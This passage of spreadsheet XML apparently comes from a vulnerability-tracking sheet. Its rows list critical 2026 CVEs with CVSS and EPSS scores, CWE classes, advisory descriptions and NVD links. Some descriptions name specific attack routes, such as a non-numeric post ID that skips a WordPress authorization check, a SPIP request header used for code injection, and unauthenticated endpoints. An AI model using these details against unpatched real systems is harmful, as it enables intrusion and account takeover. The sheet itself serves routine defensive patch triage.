          <t>The static resource interface /api/static/{deployKey}/ of Yu AI Code Mother v4.3 is vulnerable to path traversal. The user-controlled path is concatenated to the preview root directory without any normalization, allowing anonymous attackers to read files outside the preview root.</t>
        </is>
      </c>
      <c r="M239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75337</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75338</t>
        </is>
      </c>
      <c r="C240" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D240" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E240" s="5" t="inlineStr"/>
      <c r="F240" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L240" s="5" t="inlineStr">
        <is>
          <t>disconf (Distributed Configuration Management Platform) 2.6.36 is vulnerable to Incorrect Access Control. The config-fetching APIs /api/config/item, /api/config/file, /api/config/list and /api/config/simple/list are exposed without authentication. The LoginInterceptor explicitly whitelists these four paths, so any anonymous attacker can read every configuration item and configuration file managed by the config center.</t>
        </is>
      </c>
      <c r="M240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75338</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75430</t>
        </is>
      </c>
      <c r="C241" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D241" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E241" s="5" t="inlineStr"/>
      <c r="F241" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr">
        <is>
          <t>PowerJob Worker version 5.1.2 (and likely earlier versions) exposes the /worker/deployContainer HTTP endpoint without authentication on the default transport port. This allows a remote attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75430</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75816</t>
        </is>
      </c>
      <c r="C242" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D242" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E242" s="5" t="inlineStr"/>
      <c r="F242" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L242" s="5" t="inlineStr">
        <is>
          <t>The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Authentication Bypass to Account Takeover in all versions up to, and including, 3.29.12. This is due to the pre_update_value function lacking any capability or ownership check, and ActionPost::conditions_logic() short-circuiting its current_user_can('edit_post') authorization gate whenever the post ID is non-numeric — such as the string user_1 — allowing unauthenticated form submissions to be routed to arbitrary user records without restriction. This makes it possible for unauthenticated attackers to overwrite any user's registered email address, including an administrator's, and then leverage WordPress's native password-reset flow to fully take over the targeted account.</t>
        </is>
      </c>
      <c r="M242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75816</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76578</t>
        </is>
      </c>
      <c r="C243" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D243" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E243" s="5" t="inlineStr"/>
      <c r="F243" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L243" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA. The self-managed OTP token ACI does not require authentication and does not restrict which attributes may be added alongside the token entry. An unauthenticated LDAP client can exploit this, combined with a related flaw in the underlying directory server's ACI evaluation (tracked separately), to create an arbitrary attacker-controlled Kerberos principal and have it added to the administrators group. This allows a remote, unauthenticated attacker to obtain genuine FreeIPA administrator-group membership and perform administrative operations against the directory and, on SID-enabled deployments, other IdM services.</t>
        </is>
      </c>
      <c r="M243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76578</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76904</t>
        </is>
      </c>
      <c r="C244" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D244" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E244" s="5" t="inlineStr"/>
      <c r="F244" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G244" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L244" s="5" t="inlineStr">
        <is>
          <t>GeoTools is an open source Java library that provides tools for geospatial data. Starting in version 30.5 and prior to versions 33.6, 34.5, and 33.6, an SQL Injection Vulnerability is present when executing OGC Filters with PostGIS DataStore implementation: `jsonArrayContains` function; Requires PostGIS 12 or greater with a String or JSON field. For PostGIS 12 and greater `jsonArrayContains(&lt;column&gt;, &lt;pointer&gt;, &lt;value&gt;)` function writes `&lt;value&gt;` into generated SQL without escaping. Patches are available in versions 33.6, 34.5, and 33.6. No known workaround is available. To limit scope of SQL Injection the PostGIS connection pool should be configured with limited rights.</t>
        </is>
      </c>
      <c r="M244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76904</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="C245" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D245" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E245" s="5" t="inlineStr"/>
      <c r="F245" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G245" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2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45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L245" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77647</t>
        </is>
      </c>
      <c r="C246" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D246" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E246" s="5" t="inlineStr"/>
      <c r="F246" s="5" t="n">
        <v>0.026</v>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.20 allows unauthenticated remote attackers to execute arbitrary code, as exploited in the wild in August 2026. This is related to incorrect identification of &lt;?php blocks, and var_export's mishandling of certain cases such as presence of a '&lt;' character.</t>
        </is>
      </c>
      <c r="M246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77647</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77649</t>
        </is>
      </c>
      <c r="C247" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D247" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E247" s="5" t="inlineStr"/>
      <c r="F247" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr">
        <is>
          <t>The internment crate 0.8.7 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="M247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77649</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77650</t>
        </is>
      </c>
      <c r="C248" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D248" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E248" s="5" t="inlineStr"/>
      <c r="F248" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr">
        <is>
          <t>The append-only-vec crate 0.1.9 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="M248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77650</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77651</t>
        </is>
      </c>
      <c r="C249" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D249" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E249" s="5" t="inlineStr"/>
      <c r="F249" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr">
        <is>
          <t>The arrayref crate 0.3.10 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="M249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77651</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77806</t>
        </is>
      </c>
      <c r="C250" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D250" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E250" s="5" t="inlineStr"/>
      <c r="F250" s="5" t="n">
        <v>0.042</v>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L250" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.21 allows unauthenticated remote attackers to execute arbitrary code, as exploited in the wild in August 2026. This is related to code injection via an X-Spip-Filtre HTTP request header that is mishandled by analyse_resultat_skel.</t>
        </is>
      </c>
      <c r="M250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77806</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78362</t>
        </is>
      </c>
      <c r="C251" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D251" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E251" s="5" t="inlineStr"/>
      <c r="F251" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L251" s="5" t="inlineStr">
        <is>
          <t>The SEO Flow by LupsOnline WordPress plugin before 3.0.3 does not correctly validate the credential supplied with its API requests, allowing unauthenticated users to be served as the administrator who configured the SEO Flow by LupsOnline WordPress plugin before 3.0.3 and take over the site. Exploitation requires the SEO Flow by LupsOnline WordPress plugin before 3.0.3 to have been configured, which is its normal operating state.</t>
        </is>
      </c>
      <c r="M251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78362</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="C252" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D252" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E252" s="5" t="inlineStr"/>
      <c r="F252" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G252" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L252" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78509</t>
        </is>
      </c>
      <c r="C253" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D253" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E253" s="5" t="inlineStr"/>
      <c r="F253" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G253" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H253" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L253" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78510</t>
        </is>
      </c>
      <c r="C254" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D254" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E254" s="5" t="inlineStr"/>
      <c r="F254" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G254" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H254" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78573</t>
        </is>
      </c>
      <c r="C255" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D255" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E255" s="5" t="inlineStr"/>
      <c r="F255" s="5" t="inlineStr"/>
      <c r="G255" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway 1.0.0 through 1.0.7 could allow a remote attacker to gain administrative access due to the use of default credentials.</t>
        </is>
      </c>
      <c r="M255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78573</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7861</t>
        </is>
      </c>
      <c r="C256" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D256" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E256" s="5" t="inlineStr"/>
      <c r="F256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data vulnerability in Next4Biz Information Technologies Inc. CSM (Customer Service Management) allows Code Injection.
This issue affects CSM (Customer Service Management): before 8.0.3.</t>
        </is>
      </c>
      <c r="M256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7861</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78745</t>
        </is>
      </c>
      <c r="C257" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D257" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E257" s="5" t="inlineStr"/>
      <c r="F257" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L257" s="5" t="inlineStr">
        <is>
          <t>An issue in HiDPT/ Weyon HiDPTAndroid Hi3751V350 Hi3751V352E_DMO allows a remote attacker to execute arbitrary code via the Android Debug Bridge (ADB) daemon (adbd)</t>
        </is>
      </c>
      <c r="M257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78745</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79391</t>
        </is>
      </c>
      <c r="C258" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D258" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E258" s="5" t="inlineStr"/>
      <c r="F258" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr">
        <is>
          <t>No authentication exists in the MQTT service of Trueview 6.0.23.4. The MQTT broker accepts client connections on TCP port 1883 without requiring authentication, allowing a remote attacker with network access to establish an MQTT session and perform unauthorized publish or subscribe operations.</t>
        </is>
      </c>
      <c r="M258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79391</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79569</t>
        </is>
      </c>
      <c r="C259" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D259" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E259" s="5" t="inlineStr"/>
      <c r="F259" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr">
        <is>
          <t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="M259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79570</t>
        </is>
      </c>
      <c r="C260" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D260" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E260" s="5" t="inlineStr"/>
      <c r="F260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr">
        <is>
          <t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="M260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79574</t>
        </is>
      </c>
      <c r="C261" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D261" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E261" s="5" t="inlineStr"/>
      <c r="F261" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr">
        <is>
          <t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t>
        </is>
      </c>
      <c r="M261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79576</t>
        </is>
      </c>
      <c r="C262" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D262" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E262" s="5" t="inlineStr"/>
      <c r="F262" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
